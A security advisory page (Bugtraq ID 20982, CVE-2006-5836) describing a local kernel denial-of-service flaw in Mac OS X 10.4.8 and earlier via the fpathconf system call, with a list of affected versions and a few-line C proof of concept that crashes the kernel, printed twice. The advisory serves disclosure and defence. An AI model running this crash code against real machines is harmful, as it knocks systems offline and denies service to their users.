Apple Mac OS X FPathConf System Call Local Denial of Service Vulnerability
BID:20982
Info
Apple Mac OS X FPathConf System Call Local Denial of Service Vulnerability
| Bugtraq ID: | 20982 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: |
CVE-2006-5836 |
| Remote: | No |
| Local: | Yes |
| Published: | Nov 09 2006 12:00AM |
| Updated: | Mar 15 2007 03:34AM |
| Credit: | Discovery of this issue is credited to Ilja Van Sprundel. |
| Vulnerable: |
Cosmicperl Directory Pro 10.0.3 Apple Mac OS X Server 10.4.8 Apple Mac OS X Server 10.4.7 Apple Mac OS X Server 10.4.6 Apple Mac OS X Server 10.4.5 Apple Mac OS X Server 10.4.4 Apple Mac OS X Server 10.4.3 Apple Mac OS X Server 10.4.2 Apple Mac OS X Server 10.4.1 Apple Mac OS X Server 10.4 Apple Mac OS X Server 10.3.9 Apple Mac OS X Server 10.3.8 Apple Mac OS X Server 10.3.7 Apple Mac OS X Server 10.3.6 Apple Mac OS X Server 10.3.5 Apple Mac OS X Server 10.3.4 Apple Mac OS X Server 10.3.3 Apple Mac OS X Server 10.3.2 Apple Mac OS X Server 10.3.1 Apple Mac OS X Server 10.3 Apple Mac OS X Server 10.2.8 Apple Mac OS X Server 10.2.7 Apple Mac OS X Server 10.2.6 Apple Mac OS X Server 10.2.5 Apple Mac OS X Server 10.2.4 Apple Mac OS X Server 10.2.3 Apple Mac OS X Server 10.2.2 Apple Mac OS X Server 10.2.1 Apple Mac OS X Server 10.2 Apple Mac OS X Server 10.1.5 Apple Mac OS X Server 10.1.4 Apple Mac OS X Server 10.1.3 Apple Mac OS X Server 10.1.2 Apple Mac OS X Server 10.1.1 Apple Mac OS X Server 10.1 Apple Mac OS X Server 10.0 Apple Mac OS X 10.4.8 Apple Mac OS X 10.4.7 Apple Mac OS X 10.4.6 Apple Mac OS X 10.4.5 Apple Mac OS X 10.4.4 Apple Mac OS X 10.4.3 Apple Mac OS X 10.4.2 Apple Mac OS X 10.4.1 Apple Mac OS X 10.4 Apple Mac OS X 10.3.9 Apple Mac OS X 10.3.8 Apple Mac OS X 10.3.7 Apple Mac OS X 10.3.6 Apple Mac OS X 10.3.5 Apple Mac OS X 10.3.4 Apple Mac OS X 10.3.3 Apple Mac OS X 10.3.2 Apple Mac OS X 10.3.1 Apple Mac OS X 10.3 Apple Mac OS X 10.2.8 Apple Mac OS X 10.2.7 Apple Mac OS X 10.2.6 Apple Mac OS X 10.2.5 Apple Mac OS X 10.2.4 Apple Mac OS X 10.2.3 Apple Mac OS X 10.2.2 Apple Mac OS X 10.2.1 Apple Mac OS X 10.2 Apple Mac OS X 10.1.5 Apple Mac OS X 10.1.4 Apple Mac OS X 10.1.3 Apple Mac OS X 10.1.2 Apple Mac OS X 10.1.1 Apple Mac OS X 10.1 Apple Mac OS X 10.1 Apple Mac OS X 10.0.4 Apple Mac OS X 10.0.3 Apple Mac OS X 10.0.2 Apple Mac OS X 10.0.1 Apple Mac OS X 10.0 3 Apple Mac OS X 10.0 |
| Not Vulnerable: |
Apple Mac OS X Server 10.4.9 Apple Mac OS X 10.4.9 |
Discussion
Apple Mac OS X FPathConf System Call Local Denial of Service Vulnerability
Apple Mac OS X is prone to a local denial-of-service vulnerability because the kernel fails to properly handle the execution of a system call.
Exploiting this issue allows local, unprivileged users to crash affected kernels, denying further service to legitimate users.
Apple Mac OS X is prone to a local denial-of-service vulnerability because the kernel fails to properly handle the execution of a system call.
Exploiting this issue allows local, unprivileged users to crash affected kernels, denying further service to legitimate users.
Exploit / POC
Apple Mac OS X FPathConf System Call Local Denial of Service Vulnerability
The following exploit is sufficient to trigger this issue:
#include <unistd.h>
#include <semaphore.h>
int main() {
fpathconf(sem_open("DaringWussball", O_CREAT, S_IRWXU, 1), 0);
}
The following exploit is sufficient to trigger this issue:
#include <unistd.h>
#include <semaphore.h>
int main() {
fpathconf(sem_open("DaringWussball", O_CREAT, S_IRWXU, 1), 0);
}
Solution / Fix
References
Apple Mac OS X FPathConf System Call Local Denial of Service Vulnerability
References:
References: